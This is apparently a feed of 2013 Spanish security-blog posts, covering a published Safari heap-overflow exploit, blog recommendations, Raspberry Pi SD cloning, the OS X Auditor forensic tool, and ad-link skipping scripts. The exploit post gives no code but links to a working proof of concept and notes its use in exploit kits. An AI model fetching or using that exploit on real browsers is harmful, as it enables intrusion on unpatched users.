Tenéis una prueba de concepto del exploit al completo en: http://packetstormsecurity.com/files/123088/, que demuestra como usar su código Javascript para corromper la memoria de objetos JS (Unit32Array, etc.) y la posterior ejecución de código arbitrario (es posible pegar payloads ARM/x64 personalizados en el código JS).

Por supuesto, recordaros que los exploits de vulnerabilidades conocidas e incluso parcheadas son mucho más utilizados por los desarrolladores de malware y exploit kits que los zero days, simplemente por lo de siempre: son muchísimos los clientes desactualizados...

Fuente: http://packetstormsecurity.com/files/123089/Packet-Storm-Advisory-2013-0903-1-Apple-Safari-Heap-Buffer-Overflow.html

↧

Web recomendada: ./Dragon-Master

September 5, 2013, 2:32 pm

≫ Next: Cómo clonar la tarjeta SD de la Raspberry Pi

≪ Previous: Publican exploit para bug (parcheado) en Safari

Hacía tiempo que no recibíamos ninguna solicitud para dar a conocer un nuevo blog, así que nos agrada especialmente presentaros ./Dragon-Master que nace con la ilusión de un recién llegado. ¿Conseguirá con el tiempo hacerse un hueco entre nuestras suscripciones RSS? ¡Suerte y perseverancia! Os dejo con la descripción de su autor:

El blog nació inspirándome de los grandes blogs tales como dragonjar.org, hackplayers.com :) entre otros en los cuales he aprendido mucho sobre la seguridad informática. Por el momento es un proyecto personal pero espero que se vuelva una gran comunidad en el que la gente comparta sus conocimientos conmigo y entre todos y en el cual se toquen temas sobre gadgets de tecnología, noticias tecnológicas, hacking, y cosas relacionadas con el sector de la informática.

En el blog tocamos temas de tecnología nuevos gadgets cosas curiosas de la informática, redes y seguridad que es lo más primordial.

La finalidad del blog es que todos compartamos conocimientos al igual que crear una cultura de seguridad para México y el Mundo donde hay que saber que uno nunca deja de aprender y que todos somos inteligentes por igual.

Un saludo por parte de Jesús Enrique (Dragon-Master) desde Valladolid, Yucatán, México.

Sitio: dmhack.tk
Twitter: twitter.com/dragonhack991
Facebook: facebook.com/dragonmaster16734

↧

Cómo clonar la tarjeta SD de la Raspberry Pi

September 6, 2013, 8:33 am

≫ Next: OS X Auditor: herramienta de análisis forense para Mac

≪ Previous: Web recomendada: ./Dragon-Master

Tengo en marcha un proyecto con la Raspberry Pi que he llamado 'Escorial' y que pronto espero poder enseñar... Ahora que he terminado la parte del "hierro" y que voy a empezar a trastear con el software una pequeña entrada en lifehacker nos recuerda que tener una imagen de un clon de la tarjeta SD de nuestro sistema operativo puede ser muy útil a la hora de recuperarnos de algún batacazo (por otro lado tan amargos como habituales). Pero tranquilos no hay nada más fácil.

En Windows insertamos nuestra tarjeta SD en la ranura del ordenador (o en un adaptador USB en mi caso) e iniciamos Win32 Disk Imager (ya hablamos de este programa en uno de los primeros posts de RPi) y seleccionamos el fichero de imagen a crear, en nuestro ejemplo: D:/RPi/Imagenes/20130906. No hay que olvidar seleccionar la unidad asignada a la tarjeta SD. Pulsamos "Read" para crear la imagen y listo:

Ahora si queremos recuperar la imagen simplemente sería formatear la tarjeta SD, seleccionar la imagen creada y pulsar el botón "Write".

Y en Linux no es más difícil con el comando dd: dd if=/dev/sdx of=/path/to/image bs=1M...

Good backup!

↧

OS X Auditor: herramienta de análisis forense para Mac

September 9, 2013, 3:42 pm

≫ Next: Cómo saltar los enlaces de publicidad como adf.ly o similares

≪ Previous: Cómo clonar la tarjeta SD de la Raspberry Pi

OS X Auditor es una herramienta gratuita de análisis forense para Mac OS X. Está escrita en Python y parsea/hashea los siguientes elementos de un sistema en ejecución o una copia que quieras analizar:

    - las extensiones del kernel
    - los agentes del sistema y demonios
    - agentes y demonios de terceros
    - los viejos y obsoletos system y los elementos de inicio de terceros
    - agentes de usuario
    - archivos descargados de los usuarios
    - las aplicaciones instaladas

Y luego extrae:

    - archivos en cuarentena de los usuarios
    - historial de los usuarios de Safari, descargas, topsites, bases de datos HTML5 y localstore
    - cookies de Firefox, descargas, formhistory, permisos, lugares e inicios de sesión
    - historial de los usuarios de Chrome y archivos de historial, cookies, datos de acceso, sitios más visitados, datos de webs, bases de datos HTML 5 y el almacenamiento local
    - cuentas sociales y de correo electrónico de los usuarios
    - los puntos de acceso WiFi señala a los que el sistema auditado se ha conectado(y trata de geolocalizarlos)

También busca palabras clave sospechosas en el archivo .plist.

Puede verificar la reputación de cada archivo en:

    - MHR Team Cymru
    - VirusTotal
    - Malware.lu
    - su propia base de datos local

Por último, los resultados pueden ser:

    - representados como un archivo de log txt sencillo (para que puedas hacer cat-pipe-grep en ellos ... o simplemente grep )
    - representados como un archivo de log HTML
    - enviados a un servidor Syslog

Uso:

    # git clone https://github.com/jipegit/OSXAuditor.git
    # pip install pyobjc
    # python osxauditor.py -h

Web del proyecto:

   https://github.com/jipegit/OSXAuditor

↧

Cómo saltar los enlaces de publicidad como adf.ly o similares

September 10, 2013, 10:06 am

≫ Next: Web recomendada: Ensalada de Bits

≪ Previous: OS X Auditor: herramienta de análisis forense para Mac

No sé vosotros, pero yo estaba ~~hasta las pelotas~~ harto de que cuando pinchaba ciertos enlaces de descarga o noticias se me redireccionaba previamente a un sitio de publicidad mediante adf.ly o similares... Así es el negocio, lo cual no significa que no podamos hacer algo para eliminar esta molesta (y a veces peligrosa) manera de enriquecerse de algunos.

En mi caso yo utilizo (y os recomiendo) Greasemonkey en FF más un script anti-ads como Ads Skipper. Para quien no lo sepa Greasemonkey es un complemento del navegador Firefox (existen sus equivalentes en el resto) y permite "personalizar" el código Javascript, por supuesto en el lado del cliente. Con esto podemos automatizar algunas tareas y modificar en muchos aspectos el comportamiento y apariencia de los sitios, incluyendo la "evasión" de la dichosa publicidad mediante scripts como Ads Skipper.

Por otro lado lo que suelen hacer estos scripts "anti-publicidad" es reemplazar los enlaces de acortadores de URL como adf.ly o similares por el enlace original evitándonos dar ese molesto pasito y de paso ahorrándonos la espera de la cuenta atrás. Tenéis una buena lista de sitios soportados en el sitio del script.

Si te ha convencido y no lo usabas ya antes la instalación de todo es muy sencilla:

▪ Firefox

descarga e instala greasemonkey o scriptish
luego instala este script

▪ Chrome/Chromium

instala tampermonkey
luego instala este script

▪ Safari

instala Ninjakit
luego instala este script

▪ Opera

1. crea un directorio en tu equipo, por ejemplo C:\userscripts
2. copia este fichero del script y renómbralo de 118033.user.js a 118033.js
3. abre opera. Ve a Settings > Preferences > Advanced>content>javascript options>select y selecciona la carpeta creada en el paso 1.

Instala violentmonkey
Luego instala este script

↧

Web recomendada: Ensalada de Bits

September 11, 2013, 9:31 am

≫ Next: Una niña pequeña encuentra un fallo de seguridad en el nuevo escaner de huellas dactilares del iPhone 5S

≪ Previous: Cómo saltar los enlaces de publicidad como adf.ly o similares

En esta ocasión tenemos el placer de presentaros 'Ensalada de bits'el blog de María Isabel Rojo cuya carta de presentación es la siguiente:

"Desde muy pequeña ya mostraba gran interés por la seguridad informática. Leía e-zines, que en aquel entonces estaban en pleno auge, y me pasaba horas rastreando foros.

Pero todo ese tiempo pasó a dedicarse a los estudios y, durante varios años, las horas pasaron entre apuntes de bachillerato, ciclo formativo, universidad y finalmente actualización de la carrera a Bolonia.

Por fin he acabado y mi pasión por la seguridad tiene de nuevo tiempo para poder desarrollarla, ahí nació Ensalada de bits.

Ensalada de bits pretende ser ese rincón donde plasmar aquello que voy estudiando y descubriendo. Esperando ser un punto de encuentro para todos aquellos que queremos entrar en el mundo de la seguridad, sabiendo y conociendo lo que realmente estamos haciendo.

Para curiosos, entusiastas, estudiantes… Todo aquel amante de la seguridad y desarrollo web tiene su lugar en la Ensalada y espero que este blog forme parte de vuestras listas de webs de visita y referencia."

Web recomendada: http://ensaladadebits.blogspot.com

↧